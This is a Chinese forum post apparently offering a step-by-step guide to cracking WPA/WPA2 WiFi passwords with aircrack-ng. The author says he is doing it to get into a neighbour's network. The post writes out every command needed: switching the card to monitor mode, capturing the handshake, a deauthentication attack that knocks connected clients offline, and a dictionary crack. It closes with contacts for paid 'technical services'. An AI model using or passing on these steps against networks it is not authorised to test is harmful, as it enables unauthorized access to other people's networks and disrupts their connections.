查看: 337|回复: 0

用aircrack-ng暴力破解wifi密码,,供技术研究学习之用,责任自负

[复制链接]
 楼主| 发表于 2021-1-19 12:02:00 | 显示全部楼层 |阅读模式

用aircrack-ng暴力破解wifi密码,,供技术研究学习之用,来源网络,责任自负

前言:
事情是这样的,家里的宽带是广电的,TMD广电是铜轴电缆入户接一个路由,这个路由有后门,我把里面的VLANID之类的改了用一段时间配置会被恢复,好像也有DNS劫持污染丢包的问题,以前发现过改了DNS用dig命令有时候返回的数据里面没有answer section字段,就是返回的包里面没有解析结果!总之是和广电的龟儿子斗智斗勇搞来搞去还是觉得网络不怎么样,最近发现有个无线信号特别强,应该是隔壁的,比我家的信号还好,然后就想了下能不能破解。

然后就,嘿嘿嘿~~~



在网上查找一番得知aircrack-ng这个软件,用这个软件最好是在linux,成功率也高,没有装linux的可以下载backtrack或者kali之类的LIVECD刻盘或者写入启动u盘

下面开始进入正题:
11111    打开一个终端,切换到root用户,先用
複製代碼
ifconfig

                查看下无线网卡,一般是wlan0 wlan1这样的名字
              然后执行这条命令进入网卡的监听模式
複製代碼
airmon-ng start wlan0

              我的电脑执行这条命令后wlan0网卡变成了wlan0mon。
22222    执行以下命令扫描AP

複製代碼
airodump-ng wlan0mon

              然后你会看到类似下面的内容

複製代碼
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

              选一个PWR绝对值小一点的,记下BSSID和CH
33333    执行以下命令收集WPA/WPA2握手包
複製代碼
airodump-ng -w /tmp/wpatest -c 11 --bssid 00:E0:4C:81:961 wlan0mon

              -c 后面的11就是CH
              --bssid后面的是BSSID
              执行这条命令后注意看第一行的右边
複製代碼
CH  11 ][ Elapsed: 1 min ][ 2015-01-21 04:00 ][ WPA handshake:

              刚执行的时候你是看不到WPA handshake这两个单词的,这两个单词代表你已经抓到WPA/WPA2握手包了
              要怎么抓到这个握手包呢?一种办法是等,等人联这个AP的时候就能抓到,或者攻击在线客户端让它掉线重联。
              开另一个终端用下面这条命令攻击
複製代碼
aireplay-ng -0 10 -a AP's MAC  wlan0mon

              -a后面跟BSSID
              如果有客户端在线一般攻击一两次就能抓到WPA包
44444    抓到WPA包之后用这条命令破解
複製代碼
aircrack-ng -w password.lst /tmp/wpatest*.cap

              password.lst就是密码字典,就是一个文本文件,里面一行一条密码,各位可以自己随便建一个文件把自己的WIFI密码放进去,然后随便編几个密码测试能不能破解,一般就是几秒的事。
              执行这条命令之后看中间Current passphrase的位置,破解成功会有KEY FOUND 然后后面跟着破解出来的密码。



              暴力破解的关键是密码字典,如果密码在里面,破解只是时间问题
              有兴趣的可以自己拿自己的WIFI测试一下


相关技术服务需求,请联系管理员和客服QQ:592439202或QQ:619920289
您需要登录后才可以回帖 登录 | 用户注册

本版积分规则

帖子推荐:
客服咨询

QQ:592439202

服务时间 9:00-22:00

快速回复 返回顶部 返回列表